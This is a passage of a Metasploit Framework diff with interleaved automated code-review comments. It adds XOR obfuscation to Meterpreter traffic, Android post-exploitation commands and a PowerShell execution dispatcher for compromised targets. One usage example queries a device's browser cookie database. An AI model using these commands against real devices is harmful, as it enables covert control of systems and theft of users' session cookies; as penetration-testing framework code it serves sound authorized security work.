packet.get_tlv_value( TLV_TYPE_PEER_HOST ) - peerport = packet.get_tlv_value( TLV_TYPE_PEER_PORT ) - - if( peerhost and peerport ) - @datagrams << [ data, peerhost, peerport ] - return true - end - - return false - end - - # - # Wrap the _write() call in order to catch some common, but harmless Windows exceptions - # - def _write(*args) - begin - super(*args) - rescue ::Rex::Post::Meterpreter::RequestError => e - case e.code - when 10000 .. 10100 - raise ::Rex::ConnectionError.new - end - end - end - - end end; end; end; end; end; end; end 
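Review bot: The rewritten `initialize` leaves a commented-out `# rsock.extend( Rex::Socket::Udp )` with no explanation, followed by a stray blank line before `end`. If `rsock` must not get the UDP mixin, say why in the comment, e.g. `# rsock is deliberately not extended with Rex::Socket::Udp because ...`; otherwise delete the line. As written, a later reader cannot tell whether this is a pending TODO or a deliberate asymmetry with `lsock`.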
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb index 87bcdf34e4..cb2d556520 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb @@ -60,7 +60,9 @@ class EventLog def initialize(hand) self.client = self.class.client self.handle = hand - ObjectSpace.define_finalizer( self, self.class.finalize(self.client, self.handle) ) + + # Ensure the remote object is closed when all references are removed + ObjectSpace.define_finalizer(self, self.class.finalize(client, hand)) end def self.finalize(client,handle) @@ -185,7 +187,11 @@ class EventLog # Instance method def close - self.class.close(self.client, self.handle) + unless self.handle.nil? + ObjectSpace.undefine_finalizer(self) + self.class.close(self.client, self.handle) + self.handle = nil + end end end diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb index 92f77b3567..31cc02e7ff 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb @@ -285,11 +285,12 @@ class Process < Rex::Post::Process 'thread' => Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessSubsystem::Thread.new(self), }) - ObjectSpace.define_finalizer( self, self.class.finalize(self.client, self.handle) ) + # Ensure the remote object is closed when all references are removed + ObjectSpace.define_finalizer(self, self.class.finalize(client, handle)) end - def self.finalize(client,handle) - proc { self.close(client,handle) } + def self.finalize(client, handle) + proc { self.close(client, handle) } end # 
@@ -320,8 +321,12 @@ class Process < Rex::Post::Process # # Instance method # - def close(handle=self.handle) - self.class.close(self.client, handle) + def close(handle = self.handle) + unless self.pid.nil? + ObjectSpace.undefine_finalizer(self) + self.class.close(self.client, handle) + self.pid = nil + end end # diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb index bd2bbf34b0..af689a2671 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb @@ -30,7 +30,8 @@ class RegistryKey self.perm = perm self.hkey = hkey - ObjectSpace.define_finalizer( self, self.class.finalize(self.client, self.hkey) ) + # Ensure the remote object is closed when all references are removed + ObjectSpace.define_finalizer(self, self.class.finalize(client, hkey)) end def self.finalize(client,hkey) @@ -115,7 +116,11 @@ class RegistryKey # Instance method for the same def close() - self.class.close(self.client, self.hkey) + unless self.hkey.nil? + ObjectSpace.undefine_finalizer(self) + self.class.close(self.client, self.hkey) + self.hkey = nil + end end ## diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/remote_registry_key.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/remote_registry_key.rb index 7ad533e3f4..8fb734aa98 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/remote_registry_key.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/remote_registry_key.rb 
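Review bot: `Process#close` guards on `self.pid.nil?` and resets `self.pid`, but what it closes is the `handle` argument, which the caller can override. Closing any other handle through this method therefore removes the finalizer and marks the object closed while the process's own handle is never released, and `self.handle` keeps its stale value afterwards. The sibling classes in this commit (`EventLog`, `RegistryKey`, `Thread`) guard on and clear the handle itself. Assuming `handle` has a writer here, the same shape would be `unless self.handle.nil?` ... `self.handle = nil`, with the finalizer removed only when the closed handle is `self.handle`. If clearing `pid` is intentional, a comment explaining why would help.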
@@ -29,11 +29,12 @@ class RemoteRegistryKey self.target_host = target_host self.hkey = hkey - ObjectSpace.define_finalizer( self, self.class.finalize(self.client, self.hkey) ) + # Ensure the remote object is closed when all references are removed + ObjectSpace.define_finalizer(self, self.class.finalize(client, hkey)) end - def self.finalize(client,hkey) - proc { self.close(client,hkey) } + def self.finalize(client, hkey) + proc { self.close(client, hkey) } end ## @@ -113,8 +114,12 @@ class RemoteRegistryKey end # Instance method for the same - def close() - self.class.close(self.client, self.hkey) + def close + unless self.hkey.nil? + ObjectSpace.undefine_finalizer(self) + self.class.close(self.client, self.hkey) + self.hkey = nil + end end ## diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb index 43481cdc8f..4469a1e633 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb @@ -34,7 +34,9 @@ class Thread < Rex::Post::Thread self.process = process self.handle = handle self.tid = tid - ObjectSpace.define_finalizer( self, self.class.finalize(self.process.client, self.handle) ) + + # Ensure the remote object is closed when all references are removed + ObjectSpace.define_finalizer(self, self.class.finalize(process.client, handle)) end def self.finalize(client,handle) @@ -168,7 +170,11 @@ class Thread < Rex::Post::Thread # Instance method def close - self.class.close(self.process.client, self.handle) + unless self.handle.nil? + ObjectSpace.undefine_finalizer(self) + self.class.close(self.process.client, self.handle) + self.handle = nil + end end attr_reader :process, :handle, :tid # :nodoc: diff --git a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb index 0dcb281df7..3736e8faa6 100644 
--- a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb @@ -66,7 +66,7 @@ class Webcam remote_browser_path = webrtc_browser_path - if remote_browser_path.blank? + if remote_browser_path.to_s.strip.empty? fail "Unable to find a suitable browser on the target machine" end diff --git a/lib/rex/post/meterpreter/packet.rb b/lib/rex/post/meterpreter/packet.rb index 459fb2d4bb..372324381f 100644 --- a/lib/rex/post/meterpreter/packet.rb +++ b/lib/rex/post/meterpreter/packet.rb @@ -665,6 +665,44 @@ class Packet < GroupTlv end end + # + # Override the function that creates the raw byte stream for + # sending so that it generates an XOR key, uses it to scramble + # the serialized TLV content, and then returns the key plus the + # scrambled data as the payload. + # + def to_r + raw = super + xor_key = rand(254) + 1 + xor_key |= (rand(254) + 1) << 8 + xor_key |= (rand(254) + 1) << 16 + xor_key |= (rand(254) + 1) << 24 + result = [xor_key].pack('N') + xor_bytes(xor_key, raw) + result + end + + # + # Override the function that reads from a raw byte stream so + # that the XORing of data is included in the process prior to + # passing it on to the default functionality that can parse + # the TLV values. + # + def from_r(bytes) + xor_key = bytes[0,4].unpack('N')[0] + super(xor_bytes(xor_key, bytes[4, bytes.length])) + end + + # + # Xor a set of bytes with a given DWORD xor key. + # + def xor_bytes(xor_key, bytes) + result = '' + bytes.bytes.zip([xor_key].pack('V').bytes.cycle).each do |b| + result << (b[0].ord ^ b[1].ord).chr + end + result + end + ## # # Conditionals diff --git a/lib/rex/post/meterpreter/packet_dispatcher.rb b/lib/rex/post/meterpreter/packet_dispatcher.rb index db5681c8ce..dd604496a4 100644 --- a/lib/rex/post/meterpreter/packet_dispatcher.rb +++ b/lib/rex/post/meterpreter/packet_dispatcher.rb 
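Review bot: `from_r` unpacks `bytes[0,4]` without checking that at least four bytes are present. For a shorter buffer `unpack('N')[0]` is `nil`, and `xor_bytes` then fails inside `[xor_key].pack('V')` with a `TypeError` instead of a clear parse error. A guard such as `raise ArgumentError, 'packet shorter than XOR key' if bytes.nil? || bytes.length < 4` (or the project's own error type) makes the failure explicit for callers that do not go through `PacketParser`. The comments should also state that the key is prepended in the clear, so this is obfuscation of the TLV stream and provides no confidentiality or integrity. They should further note that the key is written with `pack('N')` but applied in `pack('V')` byte order, which the peer implementation has to mirror.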
@@ -117,8 +117,7 @@ module PacketDispatcher self.last_checkin = Time.now - # If the first 4 bytes are "RECV", return the oldest packet from the outbound queue - if req.body[0,4] == "RECV" + if req.method == 'GET' rpkt = send_queue.shift resp.body = rpkt || '' begin @@ -176,6 +175,7 @@ module PacketDispatcher end end + if bytes.to_i == 0 # Mark the session itself as dead self.alive = false diff --git a/lib/rex/post/meterpreter/packet_parser.rb b/lib/rex/post/meterpreter/packet_parser.rb index 8aebe3de39..c4c93d6b37 100644 --- a/lib/rex/post/meterpreter/packet_parser.rb +++ b/lib/rex/post/meterpreter/packet_parser.rb @@ -12,6 +12,11 @@ module Meterpreter ### class PacketParser + # 4 byte xor + # 4 byte length + # 4 byte type + HEADER_SIZE = 12 + # # Initializes the packet parser context with an optional cipher. # @@ -26,7 +31,7 @@ class PacketParser # def reset self.raw = '' - self.hdr_length_left = 8 + self.hdr_length_left = HEADER_SIZE self.payload_length_left = 0 end @@ -34,6 +39,9 @@ class PacketParser # Reads data from the wire and parse as much of the packet as possible. # def recv(sock) + # Create a typeless packet + packet = Packet.new(0) + if (self.hdr_length_left > 0) buf = sock.read(self.hdr_length_left) @@ -49,7 +57,10 @@ class PacketParser # payload length left to the number of bytes # specified in the length if (self.hdr_length_left == 0) - self.payload_length_left = raw.unpack("N")[0] - 8 + xor_key = raw[0, 4].unpack('N')[0] + length_bytes = packet.xor_bytes(xor_key, raw[4, 4]) + # header size doesn't include the xor key, which is always tacked on the front + self.payload_length_left = length_bytes.unpack("N")[0] - (HEADER_SIZE - 4) end elsif (self.payload_length_left > 0) buf = sock.read(self.payload_length_left) 
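Review bot: In `PacketParser#recv`, the decoded length from the peer is used unchecked in `self.payload_length_left = length_bytes.unpack("N")[0] - (HEADER_SIZE - 4)`. A value below 8 makes `payload_length_left` negative, so neither the `> 0` branch nor the later `== 0` completion test in the visible code can be reached, and the parser appears to stay stuck until something else resets it. There is also no upper bound, so a peer can announce a payload of up to 4 GiB. The length should be validated right after decoding, calling `reset` and raising when `len < HEADER_SIZE - 4 || len > MAX_PACKET_SIZE`, where `MAX_PACKET_SIZE` is a placeholder for a limit the project would have to define. The rest of `recv` lies outside this hunk, so the behaviour on a negative length should be confirmed there.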
@@ -67,14 +78,11 @@ class PacketParser if ((self.hdr_length_left == 0) && (self.payload_length_left == 0)) - # Create a typeless packet - packet = Packet.new(0) - # TODO: cipher decryption if (cipher) end - # Serialize the packet from the raw buffer + # Deserialize the packet from the raw buffer packet.from_r(self.raw) # Reset our state diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb index 8030c3329c..c3d0f48aa9 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb @@ -29,7 +29,10 @@ class Console::CommandDispatcher::Android 'device_shutdown' => 'Shutdown device', 'send_sms' => 'Sends SMS from target session', 'wlan_geolocate' => 'Get current lat-long using WLAN information', - 'interval_collect' => 'Manage interval collection capabilities' + 'interval_collect' => 'Manage interval collection capabilities', + 'activity_start' => 'Start an Android activity from a Uri string', + 'sqlite_query' => 'Query a SQLite database from storage', + 'set_audio_mode' => 'Set Ringer Mode' } reqs = { @@ -41,7 +44,10 @@ class Console::CommandDispatcher::Android 'device_shutdown' => ['device_shutdown'], 'send_sms' => ['send_sms'], 'wlan_geolocate' => ['wlan_geolocate'], - 'interval_collect' => ['interval_collect'] + 'interval_collect' => ['interval_collect'], + 'activity_start' => ['activity_start'], + 'sqlite_query' => ['sqlite_query'], + 'set_audio_mode' => ['set_audio_mode'] } # Ensure any requirements of the command are met 
@@ -151,11 +157,41 @@ class Console::CommandDispatcher::Android end end + def cmd_set_audio_mode(*args) + help = false + mode = 1 + set_audio_mode_opts = Rex::Parser::Arguments.new( + '-h' => [ false, "Help Banner" ], + '-m' => [ true, "Set Mode - (0 - Off, 1 - Normal, 2 - Max) (Default: '#{mode}')"] + ) + + set_audio_mode_opts.parse(args) do |opt, _idx, val| + case opt + when '-h' + help = true + when '-m' + mode = val.to_i + else + help = true + end + end + + if help || mode < 0 || mode > 2 + print_line('Usage: set_audio_mode [options]') + print_line('Set Ringer mode.') + print_line(set_audio_mode_opts.usage) + return + end + + client.android.set_audio_mode(mode) + print_status("Ringer mode was changed to #{mode}!") + end + def cmd_dump_sms(*args) path = "sms_dump_#{Time.new.strftime('%Y%m%d%H%M%S')}.txt" dump_sms_opts = Rex::Parser::Arguments.new( '-h' => [ false, 'Help Banner' ], - '-o' => [ false, 'Output path for sms list'] + '-o' => [ true, 'Output path for sms list'] ) dump_sms_opts.parse(args) do |opt, _idx, val| @@ -243,7 +279,7 @@ class Console::CommandDispatcher::Android dump_contacts_opts = Rex::Parser::Arguments.new( '-h' => [ false, 'Help Banner' ], - '-o' => [ false, 'Output path for contacts list'] + '-o' => [ true, 'Output path for contacts list'] ) dump_contacts_opts.parse(args) do |opt, _idx, val| @@ -347,7 +383,7 @@ class Console::CommandDispatcher::Android dump_calllog_opts = Rex::Parser::Arguments.new( '-h' => [ false, 'Help Banner' ], - '-o' => [ false, 'Output path for call log'] + '-o' => [ true, 'Output path for call log'] ) @@ -457,7 +493,7 @@ class Console::CommandDispatcher::Android end end - if dest.blank? || body.blank? + if dest.to_s.empty? || body.to_s.empty? print_error("You must enter both a destination address -d and the SMS text body -t") print_error('e.g. send_sms -d +351961234567 -t "GREETINGS PROFESSOR FALKEN."') print_line(send_sms_opts.usage) 
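Review bot: In `cmd_set_audio_mode`, `mode = val.to_i` turns any non-numeric argument into `0`, which passes the `mode < 0 || mode > 2` check and silently sets the ringer to Off. Validating the string before converting keeps a typo from becoming a real action: `mode = val =~ /\A[0-2]\z/ ? val.to_i : -1` sends bad input to the usage banner instead. The success message is also printed unconditionally, so it would be worth checking whether `client.android.set_audio_mode` can report failure.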
@@ -509,7 +545,7 @@ class Console::CommandDispatcher::Android wlan_list << [mac, ssid, ss.to_s] end - if wlan_list.blank? + if wlan_list.to_s.empty? print_error("Unable to enumerate wireless networks from the target. Wireless may not be present or enabled.") return end @@ -528,6 +564,71 @@ class Console::CommandDispatcher::Android end end + def cmd_activity_start(*args) + if (args.length < 1) + print_line("Usage: activity_start \n") + print_line("Start an Android activity from a uri") + return + end + + uri = args[0] + result = client.android.activity_start(uri) + if result.nil? + print_status("Intent started") + else + print_error("Error: #{result}") + end + end + + def cmd_sqlite_query(*args) + sqlite_query_opts = Rex::Parser::Arguments.new( + '-h' => [ false, 'Help Banner' ], + '-d' => [ true, 'The sqlite database file'], + '-q' => [ true, 'The sqlite statement to execute'], + '-w' => [ false, 'Open the database in writable mode (for INSERT/UPDATE statements)'] + ) + + writeable = false + database = '' + query = '' + sqlite_query_opts.parse(args) do |opt, _idx, val| + case opt + when '-h' + print_line("Usage: sqlite_query -d -q \n") + print_line(sqlite_query_opts.usage) + return + when '-d' + database = val + when '-q' + query = val + when '-w' + writeable = true + end + end + + if database.blank? || query.blank? + print_error("You must enter both a database files and a query") + print_error("e.g. sqlite_query -d /data/data/com.android.browser/databases/webviewCookiesChromium.db -q 'SELECT * from cookies'") + print_line(sqlite_query_opts.usage) + return + end + + result = client.android.sqlite_query(database, query, writeable) + unless writeable + header = "#{query} on database file #{database}" + table = Rex::Ui::Text::Table.new( + 'Header' => header, + 'Columns' => result[:columns], + 'Indent' => 0 + ) + result[:rows].each do |e| + table << e + end + print_line + print_line(table.to_s) + end + end + # # Name for this dispatcher # 
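Review bot: `if wlan_list.to_s.empty?` can never be true, because `wlan_list` is an Array (it is filled with `wlan_list << [mac, ssid, ss.to_s]` just above) and `[].to_s` is the two-character string `"[]"`. The "Unable to enumerate wireless networks" error is therefore unreachable, and an empty list falls through to the geolocation code below. The replacement for `blank?` on a collection is simply `if wlan_list.empty?`. The enclosing method starts and ends outside this hunk.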
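Review bot: `cmd_sqlite_query` checks its arguments with `database.blank? || query.blank?`, while the other hunks in this commit replace `blank?` with `to_s.empty?` (for example the `send_sms` check). If the goal is to stop depending on `blank?` here, this new code reintroduces it; `if database.to_s.empty? || query.to_s.empty?` matches the rest of the change. The method also indexes `result[:columns]` and `result[:rows]` without checking that a result came back, and in `-w` mode prints nothing at all, so a failed statement is indistinguishable from a successful one. Printing a status or error line in both modes would fix that. The error text "a database files" should read "a database file".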
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb index bd390e0685..7163d40674 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb @@ -866,7 +866,7 @@ class Console::CommandDispatcher::Core end pid = val.to_i when '-N' - if val.blank? + if val.to_s.empty? print_error("No process name provided") return end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb new file mode 100644 index 0000000000..9634db26cc --- /dev/null +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb 
@@ -0,0 +1,159 @@ +# -*- coding: binary -*- +require 'rex/post/meterpreter' + +module Rex +module Post +module Meterpreter +module Ui + +### +# +# Powershell extension - interact with a Powershell interpreter +# +### +class Console::CommandDispatcher::Powershell + + Klass = Console::CommandDispatcher::Powershell + + include Console::CommandDispatcher + + # + # Name for this dispatcher + # + def name + 'Powershell' + end + + # + # List of supported commands. + # + def commands + { + 'powershell_import' => 'Import a PS1 script or .NET Assembly DLL', + 'powershell_shell' => 'Create an interactive Powershell prompt', + 'powershell_execute' => 'Execute a Powershell command string' + } + end + + @@powershell_shell_opts = Rex::Parser::Arguments.new( + '-s' => [true, 'Specify the id/name of the Powershell session to interact with.'], + '-h' => [false, 'Help banner'] + ) + + def powershell_shell_usage + print_line('Usage: powershell_shell [-s session-id]') + print_line + print_line('Creates an interactive Powershell prompt.') + print_line(@@powershell_shell_opts.usage) + end + + # + # Create an interactive powershell prompts + # + def cmd_powershell_shell(*args) + if args.include?('-h') + powershell_shell_usage + return false + end + + opts = {} + + @@powershell_shell_opts.parse(args) { |opt, idx, val| + case opt + when '-s' + opts[:session_id] = val + end + } + + channel = client.powershell.shell(opts) + shell.interact_with_channel(channel) + end + + @@powershell_import_opts = Rex::Parser::Arguments.new( + '-s' => [true, 'Specify the id/name of the Powershell session to run the command in.'], + '-h' => [false, 'Help banner'] + ) + + def powershell_import_usage + print_line('Usage: powershell_import [-s session-id]') + print_line + print_line('Imports a powershell script or assembly into the target.') + print_line('The file must end in ".ps1" or ".dll".') + print_line('Powershell scripts can be loaded into any session (via -s).') + print_line('.NET assemblies are applied to 
all sessions.') + print_line(@@powershell_import_opts.usage) + end + + # + # Import a script or assembly component into the target. + # + def cmd_powershell_import(*args) + if args.length == 0 || args.include?('-h') + powershell_import_usage + return false + end + + opts = { + file: args.shift + } + + @@powershell_import_opts.parse(args) { |opt, idx, val| + case opt + when '-s' + opts[:session_id] = val + end + } + + result = client.powershell.import_file(opts) + if result.nil? || result == false + print_error("File failed to load.") + elsif result == true || result.empty? + print_good("File successfully imported. No result was returned.") + else + print_good("File successfully imported. Result:\n#{result}") + end + end + + @@powershell_execute_opts = Rex::Parser::Arguments.new( + '-s' => [true, 'Specify the id/name of the Powershell session to run the command in.'], + '-h' => [false, 'Help banner'] + ) + + def powershell_execute_usage + print_line('Usage: powershell_execute [-s session-id]') + print_line + print_line('Runs the given Powershell string on the target.') + print_line(@@powershell_execute_opts.usage) + end + + # + # Execute a simple Powershell command string + # + def cmd_powershell_execute(*args) + if args.length == 0 || args.include?('-h') + powershell_execute_usage + return false + end + + opts = { + code: args.shift + } + + @@powershell_execute_opts.parse(args) { |opt, idx, val| + case opt + when '-s' + opts[:session_id] = val + end + } + + result = client.powershell.execute_string(opts) + print_good("Command execution completed:\n#{result}") + end + +end + +end +end +end +end + diff --git a/lib/rex/proto/dcerpc/svcctl/packet.rb b/lib/rex/proto/dcerpc/svcctl/packet.rb index 6d27f6b849..7e65cb86cd 100644 --- a/lib/rex/proto/dcerpc/svcctl/packet.rb +++ b/lib/rex/proto/dcerpc/svcctl/packet.rb 
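Review bot: `cmd_powershell_execute` prints "Command execution completed" whatever `client.powershell.execute_string` returns, so a nil or false result is reported as success with an empty body. `cmd_powershell_import` in the same file already treats `nil`/`false` as failure, and the execute command should make the same distinction. What `execute_string` returns on failure is not visible in this hunk, so the exact condition needs confirming against the extension code. The three `@@powershell_*_opts` class variables would also be safer as frozen constants, since `@@` variables are shared across the inheritance tree.

```ruby
    # … unchanged: usage check and option parsing …
    result = client.powershell.execute_string(opts)
    if result.nil? || result == false
      print_error("Command execution failed.")
    else
      print_good("Command execution completed:\n#{result}")
    end
```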
@@ -53,7 +53,7 @@ class Client end end rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error getting scm handle: #{e}") + print_error("Error getting scm handle: #{e}") end [scm_handle, scm_status] @@ -124,7 +124,7 @@ class Client end end rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error creating service: #{e}") + print_error("Error creating service: #{e}") end return svc_handle, svc_status @@ -149,7 +149,7 @@ class Client response = dcerpc_client.call(CHANGE_SERVICE_CONFIG2_W, stubdata) # ChangeServiceConfig2 svc_status = error_code(response) rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error changing service description : #{e}") + print_error("Error changing service description : #{e}") end svc_status @@ -169,7 +169,7 @@ class Client svc_status = error_code(response[20,4]) end rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error closing service handle: #{e}") + print_error("Error closing service handle: #{e}") end svc_status @@ -195,7 +195,7 @@ class Client end end rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error opening service handle: #{e}") + print_error("Error opening service handle: #{e}") end svc_handle @@ -219,7 +219,7 @@ class Client svc_status = error_code(response) end rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error starting service: #{e}") + print_error("Error starting service: #{e}") end svc_status @@ -249,7 +249,7 @@ class Client svc_status = error_code(response[28,4]) end rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error controlling service: #{e}") + print_error("Error controlling service: #{e}") end svc_status 
@@ -268,7 +268,7 @@ class Client svc_status = error_code(response) end rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error deleting service: #{e}") + print_error("Error deleting service: #{e}") end svc_status @@ -292,7 +292,7 @@ class Client ret = 2 end rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error deleting service: #{e}") + print_error("Error deleting service: #{e}") end ret diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index a048138269..f47229a0bb 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -391,8 +391,9 @@ class ClientRequest # # Return the content length header + # def set_content_len_header(clen) - return "" if opts['chunked_size'] > 0 + return "" if clen == 0 || opts['chunked_size'] > 0 || (opts['headers'] && opts['headers']['Content-Length']) set_formatted_header("Content-Length", clen) end diff --git a/lib/rex/proto/kademlia/bootstrap_response.rb b/lib/rex/proto/kademlia/bootstrap_response.rb index b985ba51a7..f9e0b7bece 100644 --- a/lib/rex/proto/kademlia/bootstrap_response.rb +++ b/lib/rex/proto/kademlia/bootstrap_response.rb 
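Review bot: The new early return in `set_content_len_header` looks up `opts['headers']['Content-Length']` with an exact-case key, so a caller that supplies `content-length` or `Content-length` still gets a second, computed Content-Length appended. Two length headers that can disagree make the request's framing ambiguous to intermediaries and servers, which a general-purpose client should avoid. A case-insensitive test such as `opts['headers'].keys.any? { |k| k.to_s.casecmp('Content-Length') == 0 }` closes that gap. Separately, `clen == 0` now drops the header for empty-bodied POST/PUT requests, which some servers answer with 411; consider limiting that branch to methods without a body if the method is known at this point. The comment above the method still says "Return the content length header" although it may now return an empty string.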
@@ -51,14 +51,14 @@ module Kademlia bootstrap_peer_id = Rex::Proto::Kademlia.decode_peer_id(message.body.slice!(0, 16)) bootstrap_tcp_port, bootstrap_version, num_peers = message.body.slice!(0, 5).unpack('vCv') # protocol says there are no peers and the body confirms this, so just return with no peers - if num_peers == 0 && message.body.blank? + if num_peers == 0 && message.body.to_s.strip.empty? peers = [] else peers_data = message.body # peers data is too long/short, abort return if peers_data.size % BOOTSTRAP_PEER_SIZE != 0 peers = [] - until peers_data.blank? + until peers_data.to_s.strip.empty? peer_data = peers_data.slice!(0, BOOTSTRAP_PEER_SIZE) peer_id = Rex::Proto::Kademlia.decode_peer_id(peer_data.slice!(0, 16)) ip, udp_port, tcp_port, version = peer_data.unpack('VvvC') diff --git a/lib/rex/socket/ssl_tcp.rb b/lib/rex/socket/ssl_tcp.rb index 6539330307..f37ee3f4c8 100644 --- a/lib/rex/socket/ssl_tcp.rb +++ b/lib/rex/socket/ssl_tcp.rb @@ -65,7 +65,7 @@ begin when 'SSL2', :SSLv2 version = :SSLv2 # 'TLS' will be the new name for autonegotation with newer versions of OpenSSL - when 'SSL23', :SSLv23, 'TLS' + when 'SSL23', :SSLv23, 'TLS', 'Auto' version = :SSLv23 when 'SSL3', :SSLv3 version = :SSLv3 @@ -124,6 +124,11 @@ begin # Tie the context to a socket self.sslsock = OpenSSL::SSL::SSLSocket.new(self, self.sslctx) + # If peerhost looks like a hostname, set the undocumented 'hostname' + # attribute on sslsock, which enables the Server Name Indication (SNI) + # extension + self.sslsock.hostname = self.peerhost if !Rex::Socket.dotted_ip?(self.peerhost) + # Force a negotiation timeout begin Timeout.timeout(params.timeout) do diff --git a/lib/rex/zip/blocks.rb b/lib/rex/zip/blocks.rb index 3f0da7ecba..b2a4589710 100644 --- a/lib/rex/zip/blocks.rb +++ b/lib/rex/zip/blocks.rb 
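Review bot: `message.body` and `peers_data` hold packed binary data here (they are consumed with `slice!` and `unpack`), so `.to_s.strip.empty?` tests the wrong thing. `strip` removes whitespace and NUL bytes from the ends of the buffer, so a remaining peer record made up only of such bytes would end the `until` loop early and silently drop peers from an untrusted response. It also copies the buffer on every iteration. Since both values are already used as Strings at this point, `if num_peers == 0 && message.body.empty?` and `until peers_data.empty?` check the length directly. The enclosing method begins and ends outside the hunk.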
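Review bot: In the `@@ -124,6 +124,11 @@` hunk of `ssl_tcp.rb`, `self.sslsock.hostname = self.peerhost` is called on an attribute the added comment itself describes as undocumented, with no check that the setter exists. On a Ruby/OpenSSL build without `hostname=` the connection would fail with NoMethodError before the handshake; adding `self.sslsock.respond_to?(:hostname=)` to the condition keeps the old behaviour there. The test also treats anything that is not a dotted address as a hostname. Whether `Rex::Socket.dotted_ip?` recognises IPv6 literals is not visible in this hunk, and an address literal should not be sent as a server name, so that is worth confirming. `unless Rex::Socket.dotted_ip?(self.peerhost)` would also read more naturally than `if !`.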
@@ -116,7 +116,7 @@ class CentralDir end def pack - if @entry.central_dir_name.blank? + if @entry.central_dir_name.to_s.strip.empty? path = @entry.relative_path else path = @entry.central_dir_path diff --git a/lib/rex/zip/entry.rb b/lib/rex/zip/entry.rb index b1c4a352dc..b934d02814 100644 --- a/lib/rex/zip/entry.rb +++ b/lib/rex/zip/entry.rb @@ -76,7 +76,7 @@ class Entry end def central_dir_path - return nil if @central_dir_name.blank? + return nil if @central_dir_name.to_s.strip.empty? get_relative_path(@central_dir_name) end diff --git a/lib/tasks/custom_cucumber.rake b/lib/tasks/custom_cucumber.rake index 3dab9d0697..9b8c3fb8ae 100644 --- a/lib/tasks/custom_cucumber.rake +++ b/lib/tasks/custom_cucumber.rake @@ -12,6 +12,12 @@ begin t.fork = true # You may get faster startup if you set this to false t.profile = 'boot' end + Cucumber::Rake::Task.new({:exploit => 'db:test:prepare'}, 'Run features that should pass') do |t| + t.binary = vendored_cucumber_bin # If nil, the gem's binary is used. + t.fork = true # You may get faster startup if you set this to false + t.profile = 'exploit' + end + end rescue LoadError diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 104d24fbf7..31874f7c22 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec 
@@ -55,22 +55,22 @@ Gem::Specification.new do |spec| # Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb) spec.add_runtime_dependency 'bcrypt' # Needed for Javascript obfuscation - spec.add_runtime_dependency 'jsobfu', '~> 0.3.0' + spec.add_runtime_dependency 'jsobfu', '~> 0.4.1' # Needed for some admin modules (scrutinizer_add_user.rb) spec.add_runtime_dependency 'json' # Metasm compiler/decompiler/assembler spec.add_runtime_dependency 'metasm', '~> 1.0.2' # Metasploit::Concern hooks - spec.add_runtime_dependency 'metasploit-concern', '1.0.0' + spec.add_runtime_dependency 'metasploit-concern' # Metasploit::Credential database models - spec.add_runtime_dependency 'metasploit-credential', '1.0.1' + spec.add_runtime_dependency 'metasploit-credential', '1.1.0' # Database models shared between framework and Pro. - spec.add_runtime_dependency 'metasploit_data_models', '1.2.10' + spec.add_runtime_dependency 'metasploit_data_models', '1.3.0' # Things that would normally be part of the database model, but which # are needed when there's no database - spec.add_runtime_dependency 'metasploit-model', '1.0.0' + spec.add_runtime_dependency 